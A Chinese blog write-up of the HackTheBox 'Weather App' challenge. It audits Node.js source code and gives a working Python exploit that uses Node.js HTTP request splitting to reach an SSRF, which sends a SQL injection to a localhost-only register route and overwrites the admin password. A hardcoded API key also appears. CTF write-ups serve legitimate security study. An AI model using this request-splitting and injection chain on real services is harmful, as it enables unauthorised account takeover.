HackTherBox-WeatherApp

最新推荐文章于 2024-07-12 10:43:26 发布
最新推荐文章于 2024-07-12 10:43:26 发布
阅读量1.2k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/UserNick157/article/details/126514682
版权

Weather App靶场

参考文章:

HackTheBox做题记录

1.代码审计

开启环境后发现提供题目源码的下载,解压后分析代码。部分关键代码粘贴如下。

通过分析源码发现是一个Node.js程序,分析routes/index.js文件,大概发现有四个路由地址,其中两个区分get、post请求

router.get('/', (req, res) => {}
router.get('/register', (req, res) => {}
router.post('/register', (req, res) => {}
router.get('/login', (req, res) => {}
router.post('/login', (req, res) => {}
router.post('/api/weather', (req, res) => {}
1./login

分析路由代码后发现拿到flag的条件是使用admin用户成功登录后台

router.post('/login', (req, res) => {
	let { username, password } = req.body;
	if (username && password) {
		return db.isAdmin(username, password)
			.then(admin => {
				if (admin) return res.send(fs.readFileSync('/app/flag').toString());
				return res.send(response('You are not admin'));
			})
			.catch(() => res.send(response('Something went wrong')));
	}
	return re.send(response('Missing parameters'));
});

通过分析database.js发现数据库为sqlite数据库,且发现数据表结构,发现主键为id,username有unique属性。

const sqlite = require('sqlite-async');
const crypto = require('crypto');
	async migrate() {
        return this.db.exec(`
            DROP TABLE IF EXISTS users;

            CREATE TABLE IF NOT EXISTS users (
                id         INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
                username   VARCHAR(255) NOT NULL UNIQUE,
                password   VARCHAR(255) NOT NULL
            );

            INSERT INTO users (username, password) VALUES ('admin', '${ crypto.randomBytes(32).toString('hex') }');
        `);
    }

这里了解到在login路由中,提交执行的sql语句是经过预编译处理的,无法完成注入。

2./register

分析完login路由后分析register路由,

router.post('/register', (req, res) => {

	if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
		return res.status(401).end();
	}

	let { username, password } = req.body;

	if (username && password) {
		return db.register(username, password)
			.then(()  => res.send(response('Successfully registered')))
			.catch(() => res.send(response('Something went wrong')));
	}

	return res.send(response('Missing parameters'));
});

这里可以看到,register路由对来源地址做了限制,发起请求的地址必须是127.0.0.1,而且通过socket.remoteAddress获取请求地址,无法通过添加xff等http请求头绕过。

在向下分析,可以看到该路由将传入的username和password参数带入数据库处理

    async register(user, pass) {
        // TODO: add parameterization and roll public
        return new Promise(async (resolve, reject) => {
            try {
                let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
                resolve((await this.db.run(query)));
            } catch(e) {
                reject(e);
            }
        });
    }

这里我们发现执行的sql语句没有做预编译,也没有做过滤,所以这里可以通过sql注入获取密码,或者直接修改密码。(新建一个admin用户是行不通的)

3./api/weather

这个路由会对一个url地址发起一个get请求,url地址和部分get参数可控。

let { endpoint, city, country } = req.body;        
let apiKey = '10a62430af617a949055a46fa6dec32f';
let weatherData = await HttpHelper.HttpGet(`http://${endpoint}/data/2.5/weather?q=${city},${country}&units=metric&appid=${apiKey}`);

/api/weather分析到这里就没有思路了

2.node.js请求分割

思路卡住后去翻了大佬的WP,发现/api/weather其实存在一个ssrf,但是需要结合node.js的请求分割漏洞。

node.js请求分割漏洞参考:

Security Bugs in Practice: SSRF via Request Splitting

node.js下get请求导致的ssrf

简单理解就是因为js发起请求时,对于没有请求体的请求方式(get、delete)默认会使用一个单字节的编码去解析请求的路径。而js在发起请求前对请求路径的处理则是使用多字节解析的unicode编码,这就导致在发起请求时单字节编码会将恶意设计好的unicode编码字符解析为控制字符,导致请求分割漏洞。

3.思路整理

得到内网ssrf的方法后整理思路如下:

  • 向/api/weather发送特定数据包,触发ssrf漏洞
  • ssrf漏洞触发后将会向/register发送sql注入代码
  • sql注入代码执行后将admin用户的密码修改
  • 通过/login路由登录拿到flag
4.exp
import requests
import urllib.parse

url = "http://157.245.45.1:30165"

username = "admin"
password = "admin') ON CONFLICT(username) DO UPDATE SET password='123456';--"

username = urllib.parse.quote(username)
password = urllib.parse.quote(password)
contentLen = len(f"username={username}&password={password}")

endpoint = \
    f"""127.0.0.1/ HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: {contentLen}

username={username}&password={password}

GET /?mmp="""

city = "abandon"
country = "abandon"

endpoint = endpoint.replace(" ", "\u0120").replace("\n", f"\u0D0A")

data = {}
data.update({"endpoint": endpoint})
data.update({"city": city})
data.update({"country": country})

print(data)

response = requests.post(url=url+"/api/weather", data=data)
print(response.status_code)

"""
data从python给到weather
这里不需要编码 python发送的数据包已经编码好了
weather接收到参数后提取参数,组成目标url
http://${endpoint}/data/2.5/weather?q=${city},${country}&
weather将向外发送数据
在发送数据时,endpoint部分不会url编码,而是被js解析,将其中所有的unicode字符转换为控制字符
之后register接收到username和password后先url解码,再带入数据库查询

所以复现过程应该是
username和password先url编码一次
放入endpoint中,将endpoing中的Content-length字段值计算好填入
之后将endpoint部分的控制字符替换为unicode编码
"""
UserNick157
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTB之Weather App
f_cccc的博客
05-04 9011
HTB之Weather App 0x01 挑战说明 CHALLENGE DESCRIPTION A pit of eternal darkness, a mindless journey of abeyance, this feels like a never-ending dream. I think I'm hallucinating with the memories of my past life, it's a reflection of how thought I would have turn
教你如何把HackTheBox里面的Luke“黑掉”
知柯信安
12-12 2893
与往常一样,第一步是对主机进行Nmap识别正在运行的服务: Nmap scan report for 10.10.10.137 Host is up (0.042s latency). Not shown: 65464 closed ports, 66 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowe
Weather App
qq_40710190的博客
04-06 846
Weather App 这道题学到非常多的知识感觉收获满满😋😋😋现在回头重新整理一下思路。 白盒的难点在于如何在一套代码中找到存在的利用点,我想全部看完是不现实的❌ 而如何在一套代码中寻找呢?我目前还没有想到。大致的思路是看主页面,数据库,登录界面,注册见面等可能存在可利用点的页面,发现可利用点是一个难题,发现可利用点后将可利用点串联起来进行利用则又是一个更加困难的问题。 这题需要下载源码白盒分析 可利用点 首先就来看看index.js router.post('/register', (req, res)
新版HackTheBox做题记录(WP)
midi
04-19 3148
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
【HTB】HackTheBox-medium-Popcorn 国外渗透实战靶场
学习记录!大佬速速离开
04-14 3234
Majority Papers为笔者学习所整理的内容,本意希望借此知识输出方式达到筑牢基础的效用。如若有不足之处,还望大哥哥海涵。向值得学习的人学习,向前辈们致敬! 🌑🌕暗黑模式,解锁加倍沉浸式阅读快乐🥤 🦾祭神器--Nmap ┌──(root💀kali)-[/home/kali/桌面] └─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.6 ​​​​​​ Nmap scan report for 10.10.10.6 Ho...
Hack The Box——Luanne
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
Hack the box 上线最新炫酷功能
neal1991的专栏
05-22 1365
今天群友有人提醒 Hack the box 上线了最新的 Pwnbox,上去体验了一把,非常炫酷。Pwnbox 提供了 ssh 终端连接,以及浏览器客户端的 VNC 端,使用体验不错,这...
Hackthebox初体验
leoriclee的博客
05-08 1290
在kali下装置这几个源 apt-get install network-manager-openvpn apt-get install network-manager-openvpn-gnome apt-get install network-manager-pptp apt-get install network-manager-pptp-gnome apt-get install netwo...
IDEA debug提示Connected to the target VM, address: '127.0.0.1:xxxxx', transport: 'socket'的原因。
安夜的cookie
08-28 1万+
这个问题跟跟网上资料说的maven版本不兼容,ctrl+shift+F8 去除勾选什么的没有关系。 很明显这里不是显示启动信息的地方,这是显示变量的地方,就是断点进入后变量的展示位置。那么去找你的Console控制台吧 这里是没有的。 然后点击这个按钮就出现了console了。 有的console和endpoints是合并的,仔细一点就好了。如果你也出现了这样的问题,大可以去试一试。我的就是因...
IDEA中 Connected to the target VM, address: '127.0.0.1:62401', transport: 'socket' 问题解决
热门推荐
geng31的博客
01-02 17万+
1.在使用IDEA过程中使用bug模式会出现下面的问题Connected to the target VM, address: '127.0.0.1:62401', transport: 'socket' ,run模式正常开始以为是端口有冲突,将项目关掉,电脑重启后此问题还是会存在后来找到了解决此问题的方法,图1,是项目启动bug模式时报的问题,解决方法点击图左下角图2 ,如下图: 2.自己...
(八)ip 地址和端口
Luckyzhoufangbing的博客
09-06 506
(一)概述 (1)IP 地址用来定位计算机 (2)端口号用来定位计算机上具体的应用程序 (3)在计算机中,一切需要联网通信的软件都会占用一个端口号 (4)端口号的范围从 0 - 65536 之间 (5)在计算机中,有一些默认的端口号,最好不要去使用,比如http服务的80,在开发中使用一些好记的就行了,比如 8000,8001,3001 等等 以上就是ip 地址和端口 的知识点~ 举个例子,我在vue进行项目开发中,启动了两个项目,一个是本地node中间层,端口号是 3001,一个是vue项.
node获取请求我的客户端的地址
p1967914901的博客
07-30 1150
node获取请求我的客户端的地址 const http = require('http'); //创建 Server const server = http.createServer() // 监听request请求事件,设置请求处理函数 server.on('request', (req, res) => { // http://127.0.9.1:3000/ / // http://127.0.8.1:3000/a /a // http://127.0.0.1:3
【网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 797
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 390
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在中国的落地。、简化已有的网络战略的具体实践中,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境中管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境中扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1208
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
中职网络安全B模块渗透测试server2003
网络安全技术分享
07-09 812
将sam.hive和system.hive文件复制到win7的c盘根目录然后使用mimikatz工具提取。使用nmap扫描发现目标靶机开放端口232疑似telnet直接进行连接测试成功。
网络安全-内网安全加固方案
最新发布
PanDD_0_1的博客
07-12 513
网络安全-内网安全
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1206
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络设备安全
weixin_48579910的博客
07-11 837
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
【黑龙江网络安全等级保护测评报告】
weixin_62641226的博客
07-08 287
黑龙江信息安全等级保护测试报告》(简称“等保测试报告”),是黑龙江地区按照有关信息安全等级保护的有关规范与要求,对其进行了安全性评价并编制的一份报告。4. 安全性评测成果:从物理安全、网络安全、应用安全、数据安全以及管理安全等角度,对测评中存在的安全问题和缺陷进行了详尽的分析。5. 安全性风险评估:对所检测到的安全性问题进行风险评价,并对其可能产生的损害以及对该信息系统的影响程度进行分析。1.系统综述:对所要评价的信息系统进行了简单的介绍,包括系统的名称,功能,运行环境,网络体系结构等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值